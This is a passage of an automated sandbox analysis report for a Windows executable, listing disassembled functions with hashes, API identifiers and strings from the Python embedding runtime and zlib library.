                                                                                                                                                                                                                                          • String ID: Failed to get address for %hs$GetProcAddress$PyConfig_Clear$PyConfig_InitIsolatedConfig$PyConfig_Read$PyConfig_SetBytesString$PyConfig_SetString$PyConfig_SetWideStringList$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyPreConfig_InitIsolatedConfig$PyRun_SimpleStringFlags$PyStatus_Exception$PySys_GetObject$PySys_SetObject$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_DecRef$Py_DecodeLocale$Py_ExitStatusException$Py_Finalize$Py_InitializeFromConfig$Py_IsInitialized$Py_PreInitialize
                                                                                                                                                                                                                                          • API String ID: 199729137-653951865
                                                                                                                                                                                                                                          • Opcode ID: a72b1b0889ffc37889110ad0e4f068dcb4eb8b0bbe2e77bf2d8672c26fae6e03
                                                                                                                                                                                                                                          • Instruction ID: efe5cb9714661c6fc117c4790e4f1bf946aa44c92ddf792f0bc02a5d6581c741
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a72b1b0889ffc37889110ad0e4f068dcb4eb8b0bbe2e77bf2d8672c26fae6e03
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 01227264A0DF0791FA15BF65B894574A2A0BF487B6FC450B5C81E02260FFFDA56CC3A1
                                                                                                                                                                                                                                          Function 00007FF7125140AC Relevance: 24.0, APIs: 9, Strings: 4, Instructions: 1226COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2767812014.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767766351.00007FF7124F0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767857996.00007FF71251B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF71252E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF712532000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767968080.00007FF712534000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo$memcpy_s$fegetenv
                                                                                                                                                                                                                                          • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                                                                                                                                          • API String ID: 808467561-2761157908
                                                                                                                                                                                                                                          • Opcode ID: 7da0388417e7c773b0aab48e07e342724827a26e5879d16e5decf6c79e081c8c
                                                                                                                                                                                                                                          • Instruction ID: 62dc1c9a0ac26f126dfe4dd81494501eb38754f4a0d8f5749a7047f81e619c3c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7da0388417e7c773b0aab48e07e342724827a26e5879d16e5decf6c79e081c8c
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4AB21B72F186828BE725DF64D4807FDBBA1FB44398F842175DA0D57A84DBB8E908CB50
                                                                                                                                                                                                                                          Function 00007FF7124FACAD Relevance: 12.0, Strings: 9, Instructions: 744COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2767812014.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767766351.00007FF7124F0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767857996.00007FF71251B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF71252E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF712532000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767968080.00007FF712534000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: invalid bit length repeat$invalid code -- missing end-of-block$invalid code lengths set$invalid distance code$invalid distance too far back$invalid distances set$invalid literal/length code$invalid literal/lengths set$too many length or distance symbols
                                                                                                                                                                                                                                          • API String ID: 0-2665694366
                                                                                                                                                                                                                                          • Opcode ID: 55880860ec2df9374ed9e05eb7c1f9660e2769407a38999da05ffb99d6c3dc89
                                                                                                                                                                                                                                          • Instruction ID: 59312a5673b8437bfae7005d95cbe8f064aecb792b3abd7aecc0646fce3d7fda
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 55880860ec2df9374ed9e05eb7c1f9660e2769407a38999da05ffb99d6c3dc89
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 24523872A14AA58BD7A49F18C458B7E7BADFB85350F414138EA4A877C0EB7CDC18CB50
                                                                                                                                                                                                                                          Function 00007FF7124FD12C Relevance: 10.6, APIs: 7, Instructions: 71COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2767812014.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767766351.00007FF7124F0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767857996.00007FF71251B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF71252E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF712532000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767968080.00007FF712534000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3140674995-0
                                                                                                                                                                                                                                          • Opcode ID: 357b26123f7cc0566be18cabbec560c6351d8abd4e8582c9dfa9d4018571b442
                                                                                                                                                                                                                                          • Instruction ID: 6186b7209e92ae963fc60d930f2b6915e0db903a7c216c6a85be89b92cda1950
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 357b26123f7cc0566be18cabbec560c6351d8abd4e8582c9dfa9d4018571b442
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1A310E76608F8186EB649F64E8803ED6364FB88754F444039DA5E47B94EFB8D55CC710
                                                                                                                                                                                                                                          Function 00007FF71250A614 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2767812014.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767766351.00007FF7124F0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767857996.00007FF71251B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF71252E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF712532000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767968080.00007FF712534000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1239891234-0
                                                                                                                                                                                                                                          • Opcode ID: ae2d74aaff6e8c1310ec24f87c3395aa5518f909cdba62f6f822c67f0a9cc142
                                                                                                                                                                                                                                          • Instruction ID: 3bf1a1f25aa9ad0b64230c4e9c43a607758a6df312eafa2a824e2fcdefef63d2
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ae2d74aaff6e8c1310ec24f87c3395aa5518f909cdba62f6f822c67f0a9cc142
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EE31A436608F8186DB20DF24E8802AEB3A4FB88764F900135EE9D43B54EF7CD559CB10
                                                                                                                                                                                                                                          Function 00007FF712511874 Relevance: 7.8, APIs: 5, Instructions: 282COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2767812014.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767766351.00007FF7124F0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767857996.00007FF71251B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF71252E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF712532000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767968080.00007FF712534000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: FileFindFirst_invalid_parameter_noinfo
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2227656907-0
                                                                                                                                                                                                                                          • Opcode ID: ee5daded1920a45b930385d49f4c9fb7106de6f00b6358014c2482279c1420ad
                                                                                                                                                                                                                                          • Instruction ID: d7e84272551ee136cafa65909ef33d5906f65b7565208a58e7ad704d2bae7a00
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ee5daded1920a45b930385d49f4c9fb7106de6f00b6358014c2482279c1420ad
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EDB1D822B18E9241EA60BF2595805B9F791EB44BF4F8491B1DE5D07BC5EFBCE449C320
                                                                                                                                                                                                                                          Function 00007FF7124FD010 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2767812014.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767766351.00007FF7124F0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767857996.00007FF71251B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF71252E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF712532000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767968080.00007FF712534000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2933794660-0
                                                                                                                                                                                                                                          • Opcode ID: 884c9866f0db1ea4ea3e8c559fd458021c8c8106c035f87ab540984eb8a2d97e
                                                                                                                                                                                                                                          • Instruction ID: 4a1c67b21bc9c831534af0390f408171eebda573886de09c422792c6cad73265
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 884c9866f0db1ea4ea3e8c559fd458021c8c8106c035f87ab540984eb8a2d97e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2F110D26B14F0589EB00AF60E8942B973A4F759768F440E31DA6D867A4EFBCD159C350
                                                                                                                                                                                                                                          Function 00007FF712513C10 Relevance: 4.8, APIs: 3, Instructions: 340COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2767812014.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767766351.00007FF7124F0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767857996.00007FF71251B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF71252E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF712532000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767968080.00007FF712534000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: memcpy_s
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1502251526-0
                                                                                                                                                                                                                                          • Opcode ID: 723df14fe8405c9280d13974b9e0b256372cd2939c4def8ecbac686ef57d643c
                                                                                                                                                                                                                                          • Instruction ID: 8ab0c6ace3436d229f88f35c6f6e262d5136f9d08dc4afc67ef5e51b45b7e596
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 723df14fe8405c9280d13974b9e0b256372cd2939c4def8ecbac686ef57d643c
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B0C10572B18A8687EB24DF1AE08467AFB91F784B94F849134DB4E47744DB7DE809CB40
                                                                                                                                                                                                                                          Function 00007FF7124FA474 Relevance: 4.1, Strings: 3, Instructions: 398COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2767812014.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767766351.00007FF7124F0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767857996.00007FF71251B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF71252E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF712532000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767968080.00007FF712534000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: $header crc mismatch$unknown header flags set
                                                                                                                                                                                                                                          • API String ID: 0-1127688429
                                                                                                                                                                                                                                          • Opcode ID: fcf6ea83c7a46010d3591867e81b0f53761d3f113121264a3729654d2d1b513f
                                                                                                                                                                                                                                          • Instruction ID: 627a00315dbefc3c11ef3e1f2d086d09f314a2d6d3fba772f3fbe3e37e404da4
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fcf6ea83c7a46010d3591867e81b0f53761d3f113121264a3729654d2d1b513f
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 43F1B672A14BE58BE7A5AF18C088B3ABBE9EF84750F454534DE4907390CBB8DC59C750
                                                                                                                                                                                                                                          Function 00007FF712519728 Relevance: 3.2, APIs: 2, Instructions: 227COMMONLIBRARYCODE
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2767812014.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767766351.00007FF7124F0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767857996.00007FF71251B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF71252E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF712532000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767968080.00007FF712534000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ExceptionRaise_clrfp
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 15204871-0
                                                                                                                                                                                                                                          • Opcode ID: a4cc0e8a2f7e024105bf8074fef1866164229a93701b52dcf00f6f20498becf3
                                                                                                                                                                                                                                          • Instruction ID: f4624fc4d22841cc4253e3b16f035c76cd1c41df26c33628ca403ce49def139d
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a4cc0e8a2f7e024105bf8074fef1866164229a93701b52dcf00f6f20498becf3
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A1B18F77A00B898BEB19CF29C88636CBBF0F744B68F188861DA5D837A4CB79D455C710
                                                                                                                                                                                                                                          Function 00007FF7125039A4 Relevance: 2.8, Strings: 2, Instructions: 350COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2767812014.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767766351.00007FF7124F0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767857996.00007FF71251B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF71252E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF712532000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767968080.00007FF712534000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: $
                                                                                                                                                                                                                                          • API String ID: 0-227171996
                                                                                                                                                                                                                                          • Opcode ID: e57f1980f4491aea9eb328a1e81193c2bccc9a7e68d1918bb9b7207cf9600634
                                                                                                                                                                                                                                          • Instruction ID: 145c76315f8a05bdd45845d45422b9b6f4bdb45ce6cfe967e1b33614290900b0
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e57f1980f4491aea9eb328a1e81193c2bccc9a7e68d1918bb9b7207cf9600634
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B3E1F932A08E4295EB68AF15C8D013EB360FF44BA8F944175DA0E077D6EF79E859C718
                                                                                                                                                                                                                                          Function 00007FF7124FA2DB Relevance: 2.7, Strings: 2, Instructions: 216COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2767812014.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767766351.00007FF7124F0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767857996.00007FF71251B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF71252E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF712532000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767968080.00007FF712534000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: incorrect header check$invalid window size
                                                                                                                                                                                                                                          • API String ID: 0-900081337
                                                                                                                                                                                                                                          • Opcode ID: 7e7bac63e97a7e962ac1d8bc37368dc0e110af78d4507200a91f80e7c7b94e68
                                                                                                                                                                                                                                          • Instruction ID: eec6e6ef419195bb06446548eae2624c9a5ffedc5a313564fafef8159ef11f8f
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7e7bac63e97a7e962ac1d8bc37368dc0e110af78d4507200a91f80e7c7b94e68
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8091F772A08AD687E7A49F18C448B3E7BA9FF85360F414139DE4A467C0DBB8ED54CB10
                                                                                                                                                                                                                                          Function 00007FF71250DEF0 Relevance: 2.6, Strings: 2, Instructions: 144COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2767812014.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767766351.00007FF7124F0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767857996.00007FF71251B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF71252E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF712532000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767968080.00007FF712534000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: e+000$gfff
                                                                                                                                                                                                                                          • API String ID: 0-3030954782
                                                                                                                                                                                                                                          • Opcode ID: c8a24eaff8c968987b4d031b15ae93849e98bcf9eddb8930961e84febef9b5bc
                                                                                                                                                                                                                                          • Instruction ID: d9904bff937aa19ca603bcc5a774d8d580cb73962f2799f34bd8785f326bbd2a
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c8a24eaff8c968987b4d031b15ae93849e98bcf9eddb8930961e84febef9b5bc
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C5518B22B18AC186E7209E35DC90B6DFB91F744BA4F88C271CB9847AC5EEBDD009C710
                                                                                                                                                                                                                                          Function 00007FF71250DA5C Relevance: 1.5, Strings: 1, Instructions: 254COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2767812014.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767766351.00007FF7124F0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767857996.00007FF71251B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF71252E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF712532000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767968080.00007FF712534000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: gfffffff
                                                                                                                                                                                                                                          • API String ID: 0-1523873471
                                                                                                                                                                                                                                          • Opcode ID: bcab6200947a377332474fa44b4677218d40dcace4b26705986274372b0e4f91
                                                                                                                                                                                                                                          • Instruction ID: f1dc494fd7e9252cfab818b3518caddc4bfed0dfa115d89fb9d5a9edada24893
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bcab6200947a377332474fa44b4677218d40dcace4b26705986274372b0e4f91
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 07A18873B09BC946EB21DF25A8807ADBB90EB51BA4F408071DE8D47785EEBDD409C711
                                                                                                                                                                                                                                          Function 00007FF712508794 Relevance: 1.4, Strings: 1, Instructions: 177COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2767812014.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767766351.00007FF7124F0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767857996.00007FF71251B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF71252E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF712532000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767968080.00007FF712534000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
